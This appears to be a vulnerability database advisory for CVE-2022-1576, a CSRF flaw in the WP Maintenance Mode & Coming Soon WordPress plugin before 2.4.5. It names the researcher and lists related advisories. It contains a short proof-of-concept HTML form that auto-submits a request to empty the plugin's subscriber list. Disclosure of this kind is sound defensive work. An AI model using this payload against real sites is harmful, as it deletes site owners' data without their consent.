WP Maintenance Mode & Coming Soon < 2.4.5 – Subscribed Users Deletion via CSRF | CVE 2022-1576 | Plugin Vulnerabilities

Description

The plugin is lacking CSRF when emptying the subscribed users list, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="wpmm_subscribers_empty_list">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

wp-maintenance-mode

Fixed in 2.4.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

68deab46-1c16-46ae-a912-a104958ca4cf

Timeline

Publicly Published

2022-06-20 (about 3 years ago)

Added

2022-06-20 (about 3 years ago)

Last Updated

2023-03-26 (about 2 years ago)

Other

Published

Title

Published

2025-03-06

Title

Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins < 2.0.60 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-08-24

Title

Off-Canvas Sidebars & Menus (Slidebars) < 0.5.9 - Cross-Site Request Forgery

Published

2024-11-01

Title

MDR Webmaster Tools <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-07-21

Title

Latest Post Accordian Slider <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-07-17

Title

WP PDF Generator < 1.2.3 - Cross-Site Request Forgery